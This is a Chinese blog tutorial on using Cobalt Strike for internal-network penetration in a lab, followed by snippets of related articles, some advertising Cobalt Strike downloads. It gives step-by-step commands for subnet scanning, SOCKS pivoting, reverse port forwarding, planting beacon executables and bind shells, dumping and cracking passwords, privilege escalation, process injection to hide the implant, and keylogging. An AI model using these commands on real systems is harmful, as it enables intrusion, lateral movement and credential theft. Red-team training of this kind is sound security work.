Cobalt Strike内网渗透

最新推荐文章于 2024-05-20 20:42:03 发布
最新推荐文章于 2024-05-20 20:42:03 发布
阅读量3.6k 收藏 10
点赞数 4
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49694748/article/details/122321291
版权

1、端口扫描portscan

2、socket4a代理

3、内网渗透-端口转发

4、内网渗透-bind反弹shell

5、密码抓取hashdump logonpasswords

6、提权elevate

7、进程管理

8、进程注入inject

9、屏幕监控desktop

10、键盘记录keylogger

实验拓扑:

cs端已经拿到web的shell,对内网主机进行渗透

端口扫描

portscan 192.168.2.0/24 1-1000 对网段存活的主机进行存活扫描和端口扫描,可以用于内网扫描

或者图形化界面 右键-目标-端口扫描

 

有两种扫描方式可供选择:arp和icmp

在视图-目标中可以查看扫描到的主机

右键主机-服务即可以图形化显示扫描到的结果

socket4a代理

右键-中转(pivoting)-SOCKS Server-选择代理服务端口

 

此命令相当于在bacon命令行下输入 socks 端口

视图-代理信息-tunnel

将内容复制到msf中设置socket4a代理,注意127.0.0.1要更改为代理服务器的IP地址

无需再设置socket,直接对内网网段进行扫描(只能在msf中使用)

如果内网的服务器是一个网站,设置浏览器的代理即可访问内网网站

停止代理:socks stop

代理可以配合proxifier使用

添加代理服务器

检查代理服务器的连接情况

添加代理规则,默认所有连接到互联网的程序都会经过设置的代理

添加设置过滤条件过滤,只拦截nmap ,其他应用放行

其他应用放行

使用nmap扫描192.168.2.0/24(内网)开3389的存活IP

nmap -Pn -sT -p 3389 192.168.2.0/24

ps:CS可以开启代理,但是是socks4的代理,只能使用tcp协议,所以nmap使用的时候要使用-sT选择使用tcp_协议,还要使用-Pn不使用ICMP_的ping

内网渗透-端口转发

cs端已经拿到web的shell,下一步进行内网渗透,需要使用端口转发

dmz区:为了解决安装防火墙后外部网络的访问用户不能访问内部网络服务器的问题,而设立的一个非安全系统与安全系统之间的缓冲区

一台主机,既有公网ip又有内网ip,需要借助这台主机为跳板进行内网渗透

方式一

右键-中转(pivoting)-listener

 

或者命令行

rportfwd 4444 windows/beacon_reverse_tcp

会生成一个新的监听器用于监听web端的流量,不会生成新的代理

web端靶机开始监听4444端口

接着在cs端生成exe

注意payload一定要选择已经端口转发的payload

将生成的exe文件在内网运行

web端的4444端口和内网建立起了连接

cs端上线 上线的肉鸡ip地址后面会跟有4个点,意思是通过192.168.2.131上线的

方式二(命令行)

rportfwd 4444 172.20.10.6 5555

4444是web端监听的端口

172.20.10.6 是将流量转发到teamserver(kali)上

5555是kali端监听的端口

这条命令意思为将192.168.2.131的4444端口转发到172.20.10.6的5555端口

视图-代理信息 会生成代理,不会生成新的监视器

web端开始监听4444端口

生成一个端口为4444的监听器,注意ip地址为web端的IP

生成一个端口为5555的监听器IP地址为cs服务端(kali)IP地址

kali端开始监听5555端口

接着生成exe文件,payload一定要选择web端,因为要使用web端进行端口转发

将exe文件在内网执行

web端的4444端口和内网建立起连接

cs端

内网渗透-bind反弹shell

拿到web的shell,对内网192.168.2.129进行渗透

生成bind的监听器

然后Windows Executable(Stageless) # 生成无状态的可执行exe木马

木马生成以后,放入192.168.2.129内网机器执行

内网监听4444端口

cs端进入web端的beacon连接内网的4444端口

连接命令 :connect 192.168.2.129

成功反弹shell

断开连接命令:unlink 192.168.2.129

虽然断开了连接,内网机器仍然监听4444端口

web端的beacon可以随时连接内网机器的shell

密码抓取  需要高权限

hashdump    

logonpasswords

Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值

使用网站对NT-HASH值进行破解

https://objectif-securite.ch/en/ophcrack

密码抓取后在视图-凭证查看

提权elevate

elevate 插件名称  支持tab键补齐

进程管理

右键-目标-进程管理 或 ps

pid为该进程的pid

ppid为该进程的父进程的pid

配合kill杀死进程或者inject注入进程

进程注入

inject

inject  pid  x64|x86

或者图形化界面

右键-目标-进程管理-inject

注入完成会新生成一个会话(一定要注入到高权限的进程),将原来的木马进程杀死以便更好地隐藏

屏幕监控:desktop

键盘记录keylogger

视图-键盘记录

HeartBeat_760257130
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试之内网渗透(四):端口转发
m0_74131821的博客
04-26 1860
在真实的错综复杂的企业环境中进行内网渗透,涉及内网穿透,端口转发,域渗透,提权等一系列的难题
cobaltstrike多个版本
12-30
cobaltstrike4.3,cobaltstrike4.4,cobaltstrike4.5三个版本 安装教程以cs4.3为例: 1、xshell上传至kali,解压 unzip cobaltstrike 2、给cs的服务端teamserver和客户端start.sh执行权限 chmod +x teamserver start.sh 3、启动cs的服务端./teamserver 你的ip 密码(密码随便设置一个,待会用于客户端连接) ./teamserver 192.168.11.11 123456 4、启动cs的客户端 ./start.sh 如果出现以下报错,说明jdk有问题 Exception in thread "main" java.lang.UnsatisfiedLinkError: Can't load library: /usr/lib/jvm/java-11-openjdk-amd64/lib/libawt_xawt.so 5、重新安装jdk解决以上问题 sudo apt install openjdk-11-jdk -y 6、再次启动c
干货|内网渗透端口转发&端口映射
热门推荐
anan的博客
11-09 5万+
端口转发 端口转发,有时被叫做隧道,是安全壳为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络端口转发到另一个网络端口或从一个网络节点转发到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内网)上的一个端口。 简要说明:端口转发就是将一个端口,这个端口可以本地的端口也可以是访问到任意主机的端口,转发到任意一台可以访问的IP上...
内网渗透-端口转发
weixin_44110913的博客
10-18 1187
目录 内网转发 reGeorg结合proxychains代理链(HTTP隧道)  EW(EarthWorm)结合proxychains代理链 EW正向代理 EW反向代理 Ssocks正向代理(Linux)​ Netsh实现端口转发 Netsh实现SSH到内网主机(远程端口转发) Netsh实现3389到内网主机(远程端口转发) Netsh实现本地端口转发 LCX实现端口转发 LCX实现本地端口转发(Windows的场景) LCX实...
CobaltStrike之后渗透
Longwaer
02-12 1230
学习掌握CobaltStrike后渗透技术,更好的用于内网横向。
内网渗透神器CobaltStrike之配置与基础操作(一)
xf555er的博客
11-18 867
Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透Cobalt Strike 一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。
内网渗透工具CobaltStrike使用教程详解
qq_50854662的博客
12-15 2278
内网渗透工具CobaltStrike使用教程详解
内网端口转发
路虽远,行将至。事虽难,做必达。
08-10 992
在渗透过程中拿到主机权限后,下一步通常是进行内网横向,而企业内网在不出网的情况下,我们无法直接进行扫描、反弹shell等操作,这时候就需要搭建隧道来进行数据包转发,使我们能间接的与内网进行通信。...
内网渗透系列:内网跨边界应用
闵行小鱼塘
07-27 1207
与《内网渗透系列:内网穿透(隧道)学习》可以互相补充
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
Cobalt-Strike-4.5
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
cobaltstrike4.0
05-27
cobaltstrike4.0
CS4.9.1.1-CobaltStrike4.9.1.1版
01-18
分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透Cobalt ...
渗透测试之内网渗透(二):内网穿透
m0_74131821的博客
04-24 2394
本文将从内网穿透的原理开始探讨,根据不同的内网出网入网情况,灵活设计对应的内网穿透方案
内网安全Cobalt Strike 工具 渗透多层内网主机.(正向 || 反向)
网络安全领域___专研者.
06-03 1937
Cobalt Strike是一款以metasploit为基础的GUI的框架式渗透工具,又被业界人称为CS。拥有多种协议主机上线方式,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,winexe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等.
CobaltStrike渗透框架
weixin_56378389的博客
06-14 806
Cobalt Strike(简称为CS)是一款团队作战渗透测试神器,是一种可以用来进行横向移动、数据窃取、鱼叉式钓鱼的后渗透工具,分为客户端和服务端,一个客户端可以连接多个服务端,一个服务端也可以对应多个客户端连接。
【渗透测试】内网渗透中的端口转发
MachineGunJoe666
07-09 1311
一、内网渗透中的端口转发 需要知道,在渗透的整个流程中,根据web应用或者开放的端口进行渗透,获取webshell只是渗透这门艺术的一小部分,在真实的错综复杂的企业环境中进行内网渗透,其实水很深,涉及内网穿透,端口转发,域渗透,提权等一系列的难题。所以这篇文章对内网渗透学习进行一些记录。在这过程中参考了很多前辈们的宝贵经验,我把这些链接进行了收集,放在参考文献部分。 二、转发,映射,代理 这几个概念其实是比较难区分的,特别是和后面的内网穿透混在一起,在宏观上说,他们差别不大。但是究其本质还是存在不小的差别的
Linux网络编程:网络基础
最新发布
weixin_73234157的博客
05-20 482
当我们形成计算机网络后,小明要给他的暗恋对象小红发一句“我喜欢你”,结果发给了小芳……,在计算机网络中会出现许许多多的主机,当我们进行网络通信时,我们要通过协议来找到指定的接收方。同理在单台主机中,数据从键盘中读入再转载到当前网卡也是需要协议的。简单来说:协议就是一种约定当计算机在读取数据时,发现数据中存在向网卡输送的标志(协议)时,就往网卡输送。当网卡读取到输送给小红,网卡就不会发送给小芳。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值